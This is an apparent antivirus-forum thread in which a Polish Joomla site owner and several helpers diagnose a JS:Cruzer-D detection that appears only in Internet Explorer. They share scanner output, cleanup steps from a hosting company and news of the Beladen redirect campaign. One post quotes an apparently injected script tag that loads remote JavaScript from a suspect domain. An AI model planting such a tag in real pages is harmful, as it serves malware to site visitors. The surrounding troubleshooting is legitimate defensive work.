JS:Cruzer-D on the site

Hello,

I have a website in Polish and avast home reports there is a virus on the site. It claims it is JS:Cruzer-D. I have searched through all the files on the website (hxxp://www.razemdlaewangelii.pl) and I cannot find anything suspicous. Avast reports this particular trojan when people use IE to visit the site. Other browers and antiviruses do not see this problem. What would you suggest? Thank you very much in advance!

I couldn’t find anything obviously infected also…
Strange that it happens only with IE.
Isn’t there any infected .gif picture being redirected, or an Script blocked by Firefox and not by IE ???

Well, I have no idea why it happens only in IE. I have tried it in Chrome and FF and could not reproduce it. Also, I have downloaded all the files from the webserver and scanned them with the same avast. It does not report any error. What else should I do? Is it possible that this is FP?

Thank you!

Zbigniew Szalbot

Część zszalbot,

If it is Joomla related, you had an answer here: http://forum.joomla.pl/showthread.php?t=28904, w źródle strony widnieje jeszcze taki wpis :

^[editowany] :
^script type="text/j*vascript" src="htxp://www.lcwords.com/js/pl,158,316b16,000,13,11,1,widget.js" 

Bad stuff detektor gave this:
No zeroiframes detected!
Check took 5.78 seconds

(Level: 0) Url checked:
xttp://www.razemdlaewangelii.pl
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//media/system/js/mootools.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
htxp://www.razemdlaewangelii.pl//media/system/js/+src+
Blank page / could not connect
No ad codes identified Could have been it, check where this redirects!

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//media/system/js/caption.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//plugins/content/avreloaded/silverlight.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//plugins/content/avreloaded/wmvplayer.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//plugins/content/avreloaded/swfobject.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
htxp://www.razemdlaewangelii.pl//plugins/content/avreloaded///:
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.razemdlaewangelii.pl//plugins/content/avreloaded/avreloaded.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://maps.google.com/maps?file=api&v=2&key=abqiaaaaxjzjkjtp29efay0tentuvht350n9ugo-wypzkrhr3g_nzr-5vhqwp9qusrd4rb57pflwbcbksctruw
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (script source)
hxtp://www.lcwords.com/js/pl,158,316b16,000,13,11,1,widget.js
Zeroiframes detected on this site: 0
No ad codes identified See above,

pozdrawiam,

polonus

It’s strange that I didn’t get an alert with firefox but did with IE, so I don’t know what is on your site that is specific to IE, some sort of browser check to serve different content.

I got two distinct alerts, on with the web shield and one with the Standard shield for a file in the IE browser cache.

Web Shield alert on hXXp://www.razemdlaewangelii.pl/images/stories/konf_2009.jpg
This looks like some sort of jpg exploit.

Standard Shield alert on, konf_2009[1].html which was in my IE Temp Internet Files cache. The [1] in the end of the file name may not be the same on the web site. See image, this is I believe the sole content of this konf_2009[1].html file. This is on a single long line, I have broken it up to make it easier to see in the image.

Thank you all for helpful comments. The above file is clean. It was created in GIMP and uploaded to server so it is not the problem. I have also scanned it and there does not seem to be any issue with it.

Another user just reported a screenshot from Kapersky, where it claims there is some false GA code on the site.

I have searched the site and the article database and no joy. I am not able to find anything. One thing that needs to be checked is that the authors of the site frequently embed images from flickr and stock exchange. I wonder if this may be the problem. Is it possible that the system is infected by remote images? But then they are from well known sites… Anyway, all further hints are really appreciated!

The problem is that with content management software pages are created on the fly so to speak so it is possible for that software to be exploited and code injected into pages.

My comment on a possible jpg exploit was based only on the fact that the alert happened on a jpg file, but if it were truely a jpg exploit avast would probably have alerted to that.

You also need to find that konf_2009[1].html page as that contains only javascript and there is most certainly something wrong there with no HTML content and only obfuscated javascript, which is highly suspicious.

So given the above and another scanners also finding something suspect, there is most certainly something not right. You really need to take this up with your host too.

  • This is commonly down to old content management software being vulnerable, see this example of a HOSTs response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

  1. check all index pages for any signs of java script injected into their coding. On windows servers check any “default.aspx” or
    “default.cfm” pages as those are popular targets too.

  2. Remove any “rouge” files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
    changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

  3. Check all .htaccess files, as hackers like to load re-directs into them.

  4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
    “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

Cześć zszalbot,

Jak informuje Websense Security Labs, ponad 40000 witryn zostało zainfekowanych nowym szkodliwym kodem. Osoby odwiedzające te witryny są przekierowywane na stronę o nazwie Beladen, na której dochodzi do infekcji koniem trojańskim. W przeglądarce są też wyświetlane reklamy rzekomego oprogramowania antywirusowego.

Domena beladen.net została zarejestrowana w czerwcu ubiegłego roku. Od pewnego czasu wydawała się podejrzana i oznaczono ją jako niebezpieczną. Dopiero teraz jednak cyberprzestępcy zaczęli ją wykorzystywać.

Na razie jeszcze nie wiadomo, w jaki sposób dochodzi do ataku na witryny i jaką lukę wykorzystują przestępcy. Specjaliści prowadzą analizy w tym zakresie. Wiadomo jedynie, że atakami zagrożeni są użytkownicy starszych wersji przeglądarek internetowych,

pozdrawiam,

polonus